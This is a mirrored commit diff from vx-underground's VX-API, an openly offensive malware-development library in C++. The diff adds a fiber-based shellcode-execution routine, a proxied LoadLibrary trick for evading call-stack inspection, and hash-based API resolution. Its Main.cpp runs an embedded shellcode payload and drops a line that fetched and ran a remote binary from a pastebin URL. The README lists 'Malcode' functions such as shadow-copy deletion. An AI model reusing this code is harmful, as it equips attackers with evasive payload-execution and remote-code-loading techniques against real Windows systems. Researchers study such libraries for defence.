Mirrors
/
vxug-VXAPI
mirror of https://github.com/vxunderground/VX-API
6
0
Fork 0
Code Issues Projects Releases Wiki Activity

2.0.420 

2.0.420
This commit is contained in:
vxunderground 2022-12-05 08:05:13 -06:00
parent 1aed815bd8
commit d6ff84b546
11 changed files with 140 additions and 59 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
README.md
View File

@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.402
Version: 2.0.420
Developer: smelly__vx
@ -136,6 +136,7 @@ You're free to use this in any manner you please. You do not need to use this en
| GetRtlUserProcessParameters | ReactOS | Library Loading |
| GetTeb | ReactOS | Library Loading |
| RtlLoadPeHeaders | smelly__vx | Library Loading |
| ProxyWorkItemLoadLibrary | Rad98, Peter Winter-Smith | Library Loading |
| MpfComModifyShortcutTarget | Unknown | Malcode |
| MpfComVssDeleteShadowVolumeBackups | am0nsec | Malcode |
| OleGetClipboardData | Microsoft | Malcode |

3
VX-API/FunctionDeclaration.h
View File

@ -26,6 +26,9 @@ typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSW)(PCWSTR, BOOL, LPCWSTR*, PIN_ADD
typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSA)(PCSTR, BOOL, LPCSTR*, PIN_ADDR);
typedef PWSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGW)(PIN_ADDR, PWSTR);
typedef PSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGA)(PIN_ADDR, PSTR);
typedef INT(NTAPI* RTLUSERFIBERSTART)(VOID);
typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOL, PLARGE_INTEGER);
typedef NTSTATUS(NTAPI* RTLQUEUEWORKITEM)(PRTL_WORK_ITEM_ROUTINE, PVOID, ULONG);

30
VX-API/GetModuleHandleEx2.cpp
View File

@ -16,7 +16,21 @@ HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName)
{
ZeroMemoryEx(wDllName, sizeof(wDllName));
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
if (StringCompareA(lpModuleName, wDllName) == 0)
CHAR InitialModuleName[256] = { 0 };
CHAR IdentifiedModuleName[256] = { 0 };
if (StringCopyA(InitialModuleName, (PCHAR)lpModuleName) == NULL)
return NULL;
if (StringCopyA(IdentifiedModuleName, wDllName) == NULL)
return NULL;
PCHAR ComparisonObject1 = CaplockStringA(InitialModuleName);
PCHAR ComparisonObject2 = CaplockStringA(IdentifiedModuleName);
if (StringCompareA(ComparisonObject1, ComparisonObject2) == 0)
return (HMODULE)Module->BaseAddress;
}
@ -40,7 +54,19 @@ HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName)
Module = (PLDR_MODULE)((PBYTE)Next - 16);
if (Module->BaseDllName.Buffer != NULL)
{
if (StringCompareW(lpModuleName, Module->BaseDllName.Buffer) == 0)
WCHAR InitialModuleName[256] = { 0 };
WCHAR IdentifiedModuleName[256] = { 0 };
if (StringCopyW(InitialModuleName, (PWCHAR)lpModuleName) == NULL)
return NULL;
if (StringCopyW(IdentifiedModuleName, Module->BaseDllName.Buffer) == NULL)
return NULL;
PWCHAR ComparisonObject1 = CaplockStringW(InitialModuleName);
PWCHAR ComparisonObject2 = CaplockStringW(IdentifiedModuleName);
if (StringCompareW(ComparisonObject1, ComparisonObject2) == 0)
return (HMODULE)Module->BaseAddress;
}

1
VX-API/Internal.h
View File

@ -1124,3 +1124,4 @@ typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
typedef DWORD(CALLBACK* PRTL_WORK_ITEM_ROUTINE)(LPVOID);

14
VX-API/Main.cpp
View File

@ -30,20 +30,16 @@ int main(VOID)
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
Sei.Payload = GlobalOpenCalcPayload;
Sei.dwLengthOfPayloadInBytes = 277;
Sei.MethodEnum = E_DNSQUERYEX;
Sei.MethodEnum = E_RTLUSERFIBERSTART;
ShellcodeExecutionViaFunctionCallbackMain(&Sei);
*/
MpfLolExecuteRemoteBinaryByAppInstallerW((PWCHAR)L"https://pastebin.com/raw/tdyShwLw", 34);
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
HMODULE hMod = ProxyWorkItemLoadLibraryA("DBGHELP.DLL");
return dwError;
}

46
VX-API/ProcessInjectFiberData.cpp
View File

@ -1,46 +0,0 @@
#include "Win32Helper.h"
typedef int(WINAPI* RtlUserFiberStart)();
DWORD __revision_required_ProcessInjectFiberData(_In_ PCHAR Shellcode, _In_ DWORD Length)
{
NTSTATUS status;
DWORD OldProt = 0;
PTEB pTeb = GetTeb();
PVOID pTebFlags = (PVOID)((UINT_PTR)pTeb + 0x17ee);
*(PCHAR)pTebFlags = *(PCHAR)pTebFlags | 0x4;
HMODULE hModule = GetModuleHandleA("ntdll.dll");
RtlUserFiberStart pRtlUserFiberStart = (RtlUserFiberStart)GetProcAddress(hModule, "RtlUserFiberStart");
LPVOID BufferAddress = VirtualAlloc(NULL,
Length,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
RtlCopyMemory(BufferAddress, Shellcode, Length);
status = VirtualProtect(BufferAddress,
Length,
PAGE_EXECUTE_READ,
&OldProt);
if (status != 0)
{
UINT_PTR pFiberData = (UINT_PTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
0x100);
*(LPVOID*)(pFiberData + 0x0a8) = BufferAddress;
__writegsqword(0x20, pFiberData);
pRtlUserFiberStart();
HeapFree(GetProcessHeap(), 0, (LPVOID)pFiberData);
}
VirtualFree(BufferAddress, Length, MEM_RELEASE);
return 0;
}

49
VX-API/ProxyWorkItemLoadLibrary.cpp Normal file
View File

@ -0,0 +1,49 @@
#include "Win32Helper.h"
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName)
{
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
NTSTATUS Status = STATUS_SUCCESS;
LARGE_INTEGER Timeout = { 0 };
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
return NULL;
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryW, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
if (!NT_SUCCESS(Status))
return NULL;
Timeout.QuadPart = -500000;
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
return GetModuleHandleEx2W(lpModuleName);
}
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName)
{
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
NTSTATUS Status = STATUS_SUCCESS;
LARGE_INTEGER Timeout = { 0 };
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
return NULL;
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryA, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
if (!NT_SUCCESS(Status))
return NULL;
Timeout.QuadPart = -500000;
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
return GetModuleHandleEx2A(lpModuleName);
}

24
VX-API/ShellcodeExecutionViaFunctionCallbackMain.cpp
View File

@ -219,6 +219,30 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
}
case E_RTLUSERFIBERSTART:
{
RTLUSERFIBERSTART RtlUserFiberStart = NULL;
DWORD64 FiberData = NULL;
PTEB Teb = GetTeb();
RtlUserFiberStart = (RTLUSERFIBERSTART)GetProcAddressW((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), L"RtlUserFiberStart");
if (RtlUserFiberStart == NULL)
goto EXIT_ROUTINE;
Teb->SameTebFlags |= 0b100;
FiberData = (DWORD64)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, 0x100);
if (FiberData == NULL)
goto EXIT_ROUTINE;
*(LPVOID*)(FiberData + 0x0a8) = BinAddress;
__writegsqword(0x20, FiberData);
RtlUserFiberStart();
}
default:
goto EXIT_ROUTINE;

6
VX-API/VX-API.vcxproj
View File

@ -161,6 +161,7 @@
<ClCompile Include="GetByteArrayFromFile.cpp" />
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
<ClCompile Include="GetCurrentLocaleFromTeb.cpp" />
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp" />
<ClCompile Include="GetCurrentProcessIdFromTeb.cpp" />
<ClCompile Include="GetCurrentUserSid.cpp" />
<ClCompile Include="GetCurrentWindowTextFromUserProcessParameter.cpp" />
@ -189,8 +190,10 @@
<ClCompile Include="GetProcAddressFowlerNollVoVariant1a.cpp" />
<ClCompile Include="GetProcAddressJenkinsOneAtATime32Bit.cpp" />
<ClCompile Include="GetProcAddressLoseLose.cpp" />
<ClCompile Include="GetProcAddressMurmur.cpp" />
<ClCompile Include="GetProcAddressRotr32.cpp" />
<ClCompile Include="GetProcAddressSdbm.cpp" />
<ClCompile Include="GetProcAddressSipHash.cpp" />
<ClCompile Include="GetProcAddressSuperFastHash.cpp" />
<ClCompile Include="GetProcAddressUnknownGenericHash1.cpp" />
<ClCompile Include="GetProcessBinaryNameFromHwnd.cpp" />
@ -205,8 +208,10 @@
<ClCompile Include="HashStringFowlerNollVoVariant1a.cpp" />
<ClCompile Include="HashStringJenkinsOneAtATime32Bit.cpp" />
<ClCompile Include="HashStringLoseLose.cpp" />
<ClCompile Include="HashStringMurmur.cpp" />
<ClCompile Include="HashStringRotr32.cpp" />
<ClCompile Include="HashStringSdbm.cpp" />
<ClCompile Include="HashStringSipHash.cpp" />
<ClCompile Include="HashStringSuperFastHash.cpp" />
<ClCompile Include="HashStringUnknownGenericHash1.cpp" />
<ClCompile Include="IsDebuggerPresentEx.cpp" />
@ -228,6 +233,7 @@
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />

18
VX-API/VX-API.vcxproj.filters
View File

@ -459,6 +459,24 @@
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="HashStringMurmur.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
</ClCompile>
<ClCompile Include="HashStringSipHash.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
</ClCompile>
<ClCompile Include="GetProcAddressSipHash.cpp">
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
</ClCompile>
<ClCompile Include="GetProcAddressMurmur.cpp">
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
</ClCompile>
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp">
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">

5
VX-API/Win32Helper.h
View File

@ -88,7 +88,8 @@ typedef enum SHELLCODE_EXECUTION_METHOD {
E_ENUMERATELOADEDMODULES, //30
E_ENUMPAGEFILESW, //31
E_ENUMPWRSCHEMES, //32
E_DNSQUERYEX //33
E_DNSQUERYEX, //33
E_RTLUSERFIBERSTART //34 UNSTABLE, FAILS
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
@ -165,6 +166,8 @@ DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcNa
BOOL RtlLoadPeHeaders(_Inout_ PIMAGE_DOS_HEADER* Dos, _Inout_ PIMAGE_NT_HEADERS* Nt, _Inout_ PIMAGE_FILE_HEADER* File, _Inout_ PIMAGE_OPTIONAL_HEADER* Optional, _Inout_ PBYTE* ImageBase);
HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName);
HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName);
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName);
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName);